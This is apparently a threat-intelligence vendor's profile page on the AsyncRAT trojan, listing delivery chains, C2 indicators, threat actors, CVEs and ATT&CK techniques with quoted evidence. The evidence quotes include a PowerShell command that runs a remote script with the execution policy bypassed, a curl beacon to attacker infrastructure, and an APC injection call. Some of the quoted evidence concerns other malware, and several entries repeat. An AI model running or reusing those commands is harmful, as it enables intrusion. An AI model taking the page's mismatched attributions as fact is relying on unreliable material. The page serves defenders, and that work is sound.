Skip to main content
Mallory
MalwareRansomwareUsed by 18 actorsExploits 3 CVEs

AsyncRAT

AsyncRAT is an open-source .NET remote access trojan (RAT) widely used in cybercriminal activity and observed across numerous phishing, loader, and malware-delivery campaigns. It is commonly delivered through phishing attachments and links, including malicious LNK files, HTML smuggling, ZIP archives, ISO/ZIP/DLL/VBS/EXE chains, and abuse of Windows search-ms/search protocol handlers. It has also been delivered by custom and commodity loaders such as HeartCrypt-packed executables, PanthomVAI-style loaders, and the VOID#GEIST framework, where encrypted AsyncRAT shellcode was staged and injected into suspended explorer.exe processes. AsyncRAT has been observed as a final payload alongside or instead of other commodity malware such as Remcos RAT, XWorm, XenoRAT, DarkCloud, SmokeLoader, and Rhadamanthys.

Documented behaviors include TLS-encrypted command-and-control communications, the ability to proxy C2 traffic through a Tor client, scheduled-task persistence via schtasks.exe, and use of batch-script timeout delays to postpone cleanup of samples from %TEMP%. In one 2026 SEO-poisoning campaign documented by FOX-IT and NCC Group, AsyncRAT was deployed after installation of a weaponized ConnectWise ScreenConnect client and executed via VBScript/PowerShell and in-memory .NET loading with process hollowing into RegAsm.exe. That sample used the mutex confing_me_s, connected to hone32[.]work[.]gd and mora1987[.]work[.]gd on ports 1800-1803, and exhibited hallmark AsyncRAT traits including the default X.509 certificate CN=AsyncRAT Server, AES-256-CBC plus HMAC-SHA256 configuration protection, PBKDF2-derived keys, and TLS-based length-prefixed C2 framing. The same sample supported keylogging, clipboard monitoring, a cryptocurrency clipper for multiple currencies, victim profiling, wallet discovery, and dynamic loading of arbitrary .NET plugins over C2; it stored keystrokes in %AppData%\Keyboard\Log.tmp and clipboard captures in %AppData%\Keyboard\ClipBoard MM-dd-yyyy.tmp.

AsyncRAT has been associated in reporting with multiple threat clusters and campaigns, including TA2541 use of TLS-encrypted C2, SideCopy’s prior pattern of adopting open-source RATs such as AsyncRAT, and phishing activity discussed in relation to Kimsuky/APT-C-55. It has also been observed in attacks against vulnerable MySQL servers and in broad C2 telemetry datasets. High-confidence indicators directly mentioned in the source material include C2 IPs 79.110.49.162 and 111.90.150.186 on ports 6606, 7707, 8808, 8753, 8977, and 9907 from a Trellix-documented campaign; domains hone32[.]work[.]gd and mora1987[.]work[.]gd on ports 1800-1803 from the 2026 SEO-poisoning campaign; mutex confing_me_s; and the default certificate subject CN=AsyncRAT Server.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

3 CVES
CVE-2024-43451Windows NTLM Hash Disclosure via Malicious .url FileExploited in the wild

"...Colombian organizations were reported by Darktrace to have been targeted by Blind Eagle in an attack campaign involving the abuse of the Windows vulnerability, tracked as CVE-2024-43451, that has been ongoing since November."

via scworldscworld.com
CVE-2025-8088WinRAR Windows Path Traversal via NTFS Alternate Data StreamsExploited in the wild

Google also observed financially motivated actors exploiting the WinRAR path-traversal flaw to distribute commodity remote access tools and information stealers such as XWorm and AsyncRAT...

via bleeping computerbleepingcomputer.com
CVE-2021-44228Log4Shell

The authoring agencies have identified the following open source and dual-use tools as used and/or customized by the actors: ▪ AsyncRAT

via ic3 alertsic3.gov
THREAT ACTORS

Groups observed using it

18 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
SideCopy

The use of XenoRAT specifically strengthens this attribution, as Seqrite Labs confirmed in December 2024 that SideCopy had formally adopted customised XenoRAT variants as part of their updated toolset, following a similar pattern of open-source RAT adoption seen previously with AsyncRAT.

via malware newsmalware.news
TA2541

TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.

via mitre attack websiteattack.mitre.org
Kimsuky

Post lazarusholic lazarusholic.bsky.social did:plc:iqisolaecmif2zmpfbmsq2te "APT-C-55(Kimsuky)组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析" published by Qihoo360. #APT-C-55, #AsyncRAT, #Github, #LNK, #DPRK, #CTI

via lazarusholic blueskybsky.app
KongTuke

The terminal payload is typically XWorm or AsyncRAT, both commodity RATs sold through underground forums as Malware-as-a-Service.

via breakglass intelintel.breakglass.tech
TA583

Prior to mid-2024, this actor mostly deployed AsyncRAT and used ScreenConnect as a first stage payload less frequently. However, since mid-2024, the actor has primarily used ScreenConnect as an initial access payload. Proofpoint has also observed ScreenConnect on several occasions download and install AsyncRAT following an infection.

via proofpoint threat insight blogproofpoint.com
MuddyWater

The intrusions involved the use of a widely available .NET-based remote access Trojan AsyncRAT. ... AsyncRAT gives attackers a range of capabilities, including keystroke logging, screen capture and remote command execution.

via bank info securitybankinfosecurity.com
TA558

“The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT,” researchers wrote.

via threatpostthreatpost.com
APT-C-36

"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."

via scworldscworld.com
APT-Q-98

"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."

via scworldscworld.com
AguilaCiega

"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."

via scworldscworld.com
TA571

TA571 regularly uses 404 TDS in campaigns to deliver malware, including AsyncRAT, NetSupport, and DarkGate.

via proofpoint threat insight blogproofpoint.com
TAG-144

TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others.

via recorded future blogrecordedfuture.com
Andariel

...open-source and dual-use tools as used and/or customized by the actors: ... AsyncRAT ...

via cisa alertscisa.gov
Red Akodon

...glib-2.0.dll: Biblioteca maliciosa encargada de inyectar AsyncRAT en el proceso MSBuild.exe...

via scilabs blogblog.scilabs.mx
Stonefly/Clasiopa

The authoring agencies have identified the following open source and dual-use tools as used and/or customized by the actors: ▪ AsyncRAT

via ic3 alertsic3.gov
PureCoder

The toolkit includes PureLogs, PureHVNC, and repackaged commodity RATs (AsyncRAT, VenomRAT, DcRat, XWorm).

via derp ca blogderp.ca
ShadowSyndicate

First released in 2019, AsyncRAT enables long-term unauthorized access and post-compromise control, making it a reliable tool for credential theft, lateral movement staging, and follow-on payload delivery.

via the hacker newsthehackernews.com
MirrorFace

China-Linked MirrorFace Deploys ANEL and AsyncRAT in New Cyber Espionage Operation

via cloudatg insightscloudatg.com
MITRE ATT&CK

Techniques & procedures

38 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques
T1195Supply Chain CompromiseEvidence1

Sophos thinks a single person or group called "ischhfd83" is behind more than a hundred backdoored malware variants... Researchers linked the hundreds of GitHub repositories to a single Russian email address... Sophos researchers looked into ischhfd83's other repositories, finding 141, 133 of which were backdoored in some way or another.

T1566.001Spearphishing AttachmentEvidence3

MITRE ATT&CK® Techniques ... Initial Access T1566.001 ... Spearphishing Attachment

T1566.002Spearphishing LinkEvidence1

MITRE ATT&CK® Techniques ... Initial Access T1566.002 ... Spearphishing Link

Execution

8 techniques
T1053.005Scheduled TaskEvidence2

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

T1059.001PowerShellEvidence3
TacticExecution

In this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: ‘-ExecutionPolicy Bypass’ ... ‘-File \\internetshortcuts[.]link@80\ePWXBTXU\over.ps1’

T1059.003Windows Command ShellEvidence2
TacticExecution

APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.

T1059.006PythonEvidence1
TacticExecution

It executes its primary payload using the command: python runn.py -p new.bin -k a.json

T1203Exploitation for Client ExecutionEvidence1
TacticExecution

MITRE ATT&CK Matrix ... Initial Access ... T1203 – Exploitation for Client Execution

T1204.001Malicious LinkEvidence1
TacticExecution

Upon clicking the link in email or attachment, recipient would be redirected to the website abusing “search-ms” URI protocol handler.

T1204.002Malicious FileEvidence2
TacticExecution

As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.

T1574.001DLLEvidence1

DLL sideloading (T1574.001) is a technique in which attackers place a malicious DLL in a location that a legitimate application will load instead of the expected library... Among these is a malicious libvlc.dll, which, as a core dependency of vlc.exe, is sideloaded early in the application's execution. | Because Windows searches for DLLs in specific directories, the malicious DLL is loaded and executed when the trusted program starts.

Persistence

3 techniques
T1053.005Scheduled TaskEvidence2

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

T1112Modify RegistryEvidence1

MITRE ATT&CK Matrix ... Defense Evasion ... T1112 – Modify Registry

T1547.001Registry Run Keys / Startup FolderEvidence2

It then proceeds to create a run key in the \SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry location... This copy is registered to run automatically at each system startup...

T1053.005Scheduled TaskEvidence2

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

T1055Process InjectionEvidence1

The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.

T1055.004Asynchronous Procedure CallEvidence1

The decrypted payloads are not written to disk as executables. Instead, they are injected directly into separate instances of explorer.exe using Early Bird APC injection... QueueUserAPC(shellcode_ptr, target_thread, 0)

T1547.001Registry Run Keys / Startup FolderEvidence2

It then proceeds to create a run key in the \SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry location... This copy is registered to run automatically at each system startup...

Stealth

11 techniques
T1027Obfuscated Files or InformationEvidence1
TacticStealth

The intrusion relies on an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads... Encrypted shellcode payloads... decrypted dynamically at runtime using XOR key material stored in JSON configuration files

T1027.006HTML SmugglingEvidence1
TacticStealth

HTML smuggling, a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns... When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device.

T1055Process InjectionEvidence1

The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.

T1055.004Asynchronous Procedure CallEvidence1

The decrypted payloads are not written to disk as executables. Instead, they are injected directly into separate instances of explorer.exe using Early Bird APC injection... QueueUserAPC(shellcode_ptr, target_thread, 0)

T1070.004File DeletionEvidence1
TacticStealth

MITRE ATT&CK Matrix ... Defense Evasion ... T1070.004 – Indicator Removal on Host: File Deletion

T1140Deobfuscate/Decode Files or InformationEvidence1
TacticStealth

The script then loads the XOR decryption key from a.json... Upon decoding, the script performs an XOR-based decryption in memory

T1218.010Regsvr32Evidence1
TacticStealth

If the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.

T1497.001System ChecksEvidence1

Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.

T1497.003Time Based ChecksEvidence1

Virtualization/Sandbox Evasion: Time Based Checks - T1497.003 The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities.

T1574.001DLLEvidence1

DLL sideloading (T1574.001) is a technique in which attackers place a malicious DLL in a location that a legitimate application will load instead of the expected library... Among these is a malicious libvlc.dll, which, as a core dependency of vlc.exe, is sideloaded early in the application's execution. | Because Windows searches for DLLs in specific directories, the malicious DLL is loaded and executed when the trusted program starts.

T1620Reflective Code LoadingEvidence1
TacticStealth

All decrypted shellcode payloads (XWorm, XenoRAT, AsyncRAT) execute directly in memory; no decrypted executables are ever written to disk

T1112Modify RegistryEvidence1

MITRE ATT&CK Matrix ... Defense Evasion ... T1112 – Modify Registry

Discovery

8 techniques
T1033System Owner/User DiscoveryEvidence1
TacticDiscovery

The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.

T1057Process DiscoveryEvidence1
TacticDiscovery

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

T1069Permission Groups DiscoveryEvidence1
TacticDiscovery

Examples include 'TrickBot can identify the user and groups the user belongs to on a compromised host' and multiple entries checking whether the current user is an administrator or has elevated privileges.

T1082System Information DiscoveryEvidence1
TacticDiscovery

MITRE ATT&CK® Techniques ... Discovery T1082 System Information Discovery

T1083File and Directory DiscoveryEvidence1
TacticDiscovery

MITRE ATT&CK Matrix ... Discovery T1083 – File and Directory Discovery

T1497.001System ChecksEvidence1

Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.

T1497.003Time Based ChecksEvidence1

Virtualization/Sandbox Evasion: Time Based Checks - T1497.003 The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities.

T1518Software DiscoveryEvidence1
TacticDiscovery

MITRE ATT&CK Matrix ... Discovery T1518 – Software Discovery

Collection

1 technique
T1005Data from Local SystemEvidence1

Xworm Capabilities & Impact... Data Theft: Credential stealing, keylogging, screen capturing... XenoRAT... Information Theft: Keylogging, clipboard monitoring, credential harvesting, and screen capturing... AsyncRAT... Information Theft: Keylogging, clipboard monitoring, credential harvesting, and screen capturing.

T1071Application Layer ProtocolEvidence5

Further we see usage of PROPFIND method ... GET method is used to retrieve the content of the file ... MITRE ATT&CK® Techniques ... Command and Control T1071 Application Layer Protocol

T1071.001Web ProtocolsEvidence1

The infection chain concludes by transmitting a minimal HTTP beacon back to attacker-controlled command-and-control (C2) infrastructure hosted on TryCloudflare... curl -X POST -d “status=success”

T1090.003Multi-hop ProxyEvidence1

During the 2025 Poland Wiper Attacks, the adversaries utilized Tor nodes for C2. APT28 has routed traffic over Tor and VPN servers to obfuscate their activities. A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.

T1102.003One-Way CommunicationEvidence1

A lightweight HTTP POST beacon (status=success) is transmitted to attacker-controlled infrastructure hosted on TryCloudflare, providing operators confirmation of successful staging and injection.

T1105Ingress Tool TransferEvidence1

This PowerShell command downloads and executes another PowerShell script... This script downloads two further files... The downloader batch file... also downloads and executes the final payload...

T1571Non-Standard PortEvidence1

MITRE ATT&CK® Techniques ... Command and Control T1571 Non-Standard Port

T1573Encrypted ChannelEvidence1

For all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

Xworm Capabilities & Impact... Data Theft... Enables attackers to conduct espionage... The infection chain concludes by transmitting a minimal HTTP beacon back to attacker-controlled command-and-control (C2) infrastructure

INDICATORS OF COMPROMISE

IOCs tracked for this family

505 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
254 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
216 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
35 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in apptoday
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching505

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution18

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities3

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping38

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.